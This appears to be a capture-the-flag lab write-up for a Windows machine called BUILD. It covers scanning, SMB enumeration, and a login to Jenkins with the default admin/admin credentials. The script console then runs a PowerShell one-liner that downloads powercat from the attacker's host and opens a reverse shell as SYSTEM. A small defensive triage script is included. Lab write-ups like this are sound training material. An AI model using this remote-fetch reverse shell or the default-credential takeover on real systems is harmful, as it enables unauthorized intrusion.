# Lab setup

Download link: Build

Download and import it, set the network to NAT mode, and get started.

IP: 10.10.10.8

# Penetration process

# Initial information gathering

Start with a service scan:

```
┌──(root㉿kali)-[~]
└─# nmap -p- -sV -T4 10.10.10.8 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-22 04:27 EDT
Nmap scan report for 10.10.10.8
Host is up (0.00037s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
8080/tcp  open  http          Jetty 12.0.19
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:F0:28:66 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.38 seconds
```

The likely entry points are the web service on 80, RPC on 135, SMB on 445 and Jenkins on 8080.

# 80

Had a look at port 80; nothing of interest there.

# RPC

```
┌──(root㉿kali)-[~]
└─# rpcclient -NU "" 10.10.10.8 -c "srvinfo"
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED
```

# SMB

First, gather some SMB information:

```
┌──(root㉿kali)-[~]
└─# netexec smb 10.10.10.8   
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating missing folder logs/sam
[*] Creating missing folder logs/lsa
[*] Creating missing folder logs/ntds
[*] Creating missing folder logs/dpapi
[*] Creating default workspace
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Initializing RDP protocol database
[*] Initializing NFS protocol database
[*] Initializing WMI protocol database
[*] Initializing FTP protocol database
[*] Initializing VNC protocol database
[*] Initializing MSSQL protocol database
[*] Copying default configuration file
SMB         10.10.10.8      445    BUILD            [*] Windows 10 / Server 2019 Build 19041 x64 (name:BUILD) (domain:BUILD) (signing:False) (SMBv1:False)
```

That gives us the following:

- Operating system: Windows 10 or Server 2019
- Build: 19041 x64
- Computer name: BUILD
- Domain: BUILD
- SMB signing: False (not enforced; a security risk)
- SMBv1: False (disabled; good)

Next, check whether anonymous access is allowed:

```
┌──(root㉿kali)-[~]
└─# smbclient -NL //10.10.10.8    
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(root㉿kali)-[~]
└─# smbmap --no-banner -H 10.10.10.8 -u '' -p ''
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)

┌──(root㉿kali)-[~]
└─# netexec smb 10.10.10.8 -u '' -p ''
SMB         10.10.10.8      445    BUILD            [*] Windows 10 / Server 2019 Build 19041 x64 (name:BUILD) (domain:BUILD) (signing:False) (SMBv1:False) 
SMB         10.10.10.8      445    BUILD            [-] BUILD\: STATUS_ACCESS_DENIED
```

Everything comes back DENIED, so there is no anonymous access.
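To show what the nmap and netexec output above actually establishes from the defender's side, here is an added Python example (not part of the original writeup) that parses constructed copies of those lines and turns them into a short findings list; the sample text and the triage rules are my own assumptions, not the tools' output formats in general.

```python
import re

# Constructed samples modelled on the nmap and netexec lines in this writeup
# (typed in here, not captured from a live scan).
NMAP_SAMPLE = """\
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
8080/tcp  open  http          Jetty 12.0.19
"""
NETEXEC_SAMPLE = (
    "SMB         10.10.10.8      445    BUILD            [*] Windows 10 / Server 2019 "
    "Build 19041 x64 (name:BUILD) (domain:BUILD) (signing:False) (SMBv1:False)"
)
NMAP_ROW = re.compile(r"^(\d+)/(?:tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Return {port: (service, version)} for every open row of an nmap -sV table."""
    ports = {}
    for line in text.splitlines():
        m = NMAP_ROW.match(line)
        if m and m.group(2) == "open":
            ports[int(m.group(1))] = (m.group(3), m.group(4).strip())
    return ports

def parse_netexec_smb(line):
    """Extract the (key:value) flags such as signing:False from a netexec SMB banner line."""
    return dict(re.findall(r"\((\w+):([^)]*)\)", line))

def triage(ports, smb):
    """Turn the parsed facts into the findings a defender would act on for this host."""
    findings = []
    if smb.get("signing") == "False":
        findings.append("445: SMB signing not required; enforce signing to block relay")
    if smb.get("SMBv1") == "True":
        findings.append("445: SMBv1 enabled; disable it")
    for port, (service, version) in sorted(ports.items()):
        if service == "http" and version.startswith("Jetty"):
            findings.append(f"{port}: Jetty (usually Jenkins); reject default admin credentials "
                            "and restrict the script console to trusted admins")
    return findings

if __name__ == "__main__":
    for finding in triage(parse_nmap(NMAP_SAMPLE), parse_netexec_smb(NETEXEC_SAMPLE)):
        print(finding)
```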

# 8080 Jenkins

Port 8080 is Jetty, an HTTP service. Open it in a browser.

The weak credentials admin/admin log in straight away.

# Exploitation

# Jenkins

Jenkins on port 8080: the weak credentials admin:admin log in straight away.

It turns out commands can be executed, and they run with NT AUTHORITY\SYSTEM privileges.

Time for a reverse shell. Download the PowerShell reverse shell script powercat.

Start an HTTP server with Python:

```
┌──(root㉿kali)-[~]
└─# python3 -m http.server 9527
Serving HTTP on 0.0.0.0 port 9527 (http://0.0.0.0:9527/) ...
```

Then run the reverse shell command directly in the script console:

```groovy
println "powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.9:9527/powercat.ps1'); powercat -c 10.10.10.9 -p 4444 -e cmd".execute().text
```

And we get a shell as NT AUTHORITY\SYSTEM straight away:

```
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.10.9] from (UNKNOWN) [10.10.10.8] 62587
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\Jenkins>whoami
whoami
nt authority\system
C:\Program Files\Jenkins>type C:\users\builder\Desktop\user.txt
type C:\users\builder\Desktop\user.txt
17a6390c294493b8fc423154791cdd0b 
C:\Program Files\Jenkins>type C:\users\administrator\Desktop\root.txt
type C:\users\administrator\Desktop\root.txt
927c9a24e72f5d76ffd8bc9c2477d10f
```

Reading other people's writeups, SMB was left open so that nc.exe could be served from an SMB share and then used to pop a shell, but powercat does it in one step.